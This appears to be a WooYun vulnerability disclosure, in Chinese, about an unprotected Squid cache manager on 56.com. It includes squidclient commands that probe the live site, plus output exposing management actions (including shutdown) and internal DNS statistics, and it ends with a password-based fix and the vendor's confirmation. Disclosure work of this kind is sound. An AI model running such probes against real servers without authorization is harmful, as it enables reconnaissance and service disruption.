当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086365

漏洞标题:我乐网主站某服务配置不当

相关厂商:56.com

漏洞作者: 路人甲

提交时间:2014-12-08 13:30

修复时间:2015-01-22 13:32

公开时间:2015-01-22 13:32

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-08: 厂商已经确认,细节仅向厂商公开
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

我乐网主站某服务配置不当

详细说明:

我乐网 squid ACL配置当导致信息泄露。

lala@lala:~$ squidclient -h www.56.com -p 80 mgr:
HTTP/1.0 200 OK
Server: Cdn Cache Server V2.0
Date: Mon, 08 Dec 2014 05:11:40 GMT
Content-Type: text/plain
Expires: Mon, 08 Dec 2014 05:11:40 GMT
Last-Modified: Mon, 08 Dec 2014 05:11:40 GMT
X-Via: 1.0 sccdxx14:4 (Cdn Cache Server V2.0)
Connection: close
mem Memory Utilization public
cbdata Callback Data Registry Contents public
events Event Queue public
squidaio_counts Async IO Function Counters public
coss COSS Stats public
config Current Squid Configuration hidden
plugin plugin info public
ipcache IP Cache Stats and Contents public
ipaccess IP Access Stats and Contents public
fqdncache FQDN Cache Stats and Contents public
idns Internal DNS Statistics public
external_acl External ACL stats public
http_headers HTTP Header Statistics public
menu This Cachemanager Menu public
##注意这个!##shutdown Shut Down the Squid Process hidden
offline_toggle Toggle offline_mode setting hidden
malloc_print Print malloc statistic public
denyattack_dynconf This Cachemanager denyattack_dynconf public
denyattack_dynconf_del This Cachemanager denyattack_dynconf_del public
denyattack_dynconf_print This Cachemanager denyattack_dynconf_print public
put_ip_blackwhite_list This Cachemanager put_ip_blackwhite_list public
del_ip_blackwhite_list This Cachemanager del_ip_blackwhite_list public
get_ip_blackwhite_list This Cachemanager get_ip_blackwhite_list public
put_url_blackwhite_list This Cachemanager put_url_blackwhite_list public
del_url_blackwhite_list This Cachemanager del_url_blackwhite_list public
get_url_blackwhite_list This Cachemanager get_url_blackwhite_list public
get_ahtml_content This Cachemanager get_ahtml_content public
put_rate_limit This Cachemanager put_rate_limit public
del_rate_limit This Cachemanager del_rate_limit public
put_miss_rate_limit This Cachemanager put_miss_rate_limit public
del_miss_rate_limit This Cachemanager del_miss_rate_limit public
put_miss_times_limit This Cachemanager put_miss_times_limit public
del_miss_times_limit This Cachemanager del_miss_times_limit public
put_times_limit This Cachemanager put_times_limit public
del_times_limit This Cachemanager del_times_limit public
put_bwctrl_para This Cachemanager put_bwctrl_para public
put_max_conns This Cachemanager put_max_conns public
get_bwctrl_limit This Cachemanager get_bwctrl_limit public
reconfigure Interface for dynamic reconfigure public
host_list Interface for list host info public
forward_warning Forward Error Warning public
traffic Traffic count by host public
traffic_n Traffic count by host public
traffic_time Traffic count by host(cleared every 5 min) public
traffic_bw Traffic count by host for bwctrl public
process_info get the ports that are listened by precesses public
404 Request count by host public
status Response status code count by host public
info General Runtime Information public
qos_stat Get QoS Statistics public
qos Get QoS Statistics public
filedescriptors Process Filedescriptor Allocation public
objects All Cache Objects public
vm_objects In-Memory and In-Transit Objects public
openfd_objects Objects with Swapout files open public
pending_objects Objects being retreived from the network public
client_objects Objects being sent to clients public
io Server-side network read() size histograms public
counters Traffic and Resource Counters public
peer_select Peer Selection Algorithms public
digest_stats Cache Digest and ICP blob public
5min 5 Minute Average of Counters public
60min 60 Minute Average of Counters public
utilization Cache Utilization public
histograms Full Histogram Counts public
active_requests Client-side Active Requests public
ssd_hot show top hot file of every cache dir public
conns_table show host cons num public
websocket WebSocket information public
purge_dir Purge Dir Stats public
storedir Store Directory Stats public
lrulist lrulist public
store_check_cachable_stats storeCheckCachable() Stats public
store_io Store IO Interface Stats public
store_stat_by_domain Number of Files, Store Size and The Oldest Lastref Time according to host public
tcp_retrans tcp_retrans public
pconn Persistent Connection Utilization Histograms public
refresh Refresh Algorithm Statistics public
delay Delay Pool Levels public
forward Request Forwarding Statistics public
server_list Peer Cache Statistics public
carp CARP information public
client_list Cache Client List public
asndb AS Number Database public

漏洞证明:

~$ squidclient -h www.56.com -p 80 mgr:idns
HTTP/1.0 200 OK
Server: Cdn Cache Server V2.0
Date: Mon, 08 Dec 2014 05:14:22 GMT
Content-Type: text/plain
Expires: Mon, 08 Dec 2014 05:14:22 GMT
Last-Modified: Mon, 08 Dec 2014 05:14:22 GMT
X-Via: 1.0 cdxx63:6 (Cdn Cache Server V2.0)
Connection: close
Internal DNS Statistics:
The Queue:
DELAY SINCE
ID SIZE SENDS FIRST SEND LAST SEND
------ ---- ----- ---------- ---------
Nameservers:
IP ADDRESS #NHOST # QUERIES # REPLIES
--------------- ------ --------- ---------
115.x.x.90 3953 6925 6728
121.x.x.73 3953 197 197
61.x.x.200 3953 12 12
111.x.x.88 3953 12 12
218.x.x.86 3953 12 12
202.x.x.166 7 378 378
61.x.x.254 7 0 0
202.x.x.55 7 0 0
Rcode Matrix:
RCODE ATTEMPT1 ATTEMPT2 ATTEMPT3
0 6979 0 0
1 0 0 0
2 0 0 0
3 312 0 0
4 0 0 0
5 0 0 0

修复方案:

cachemgr_passwd password_here all

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-12-08 16:50

厂商回复:

很感激漏洞发现者,已经修复。

最新状态:

暂无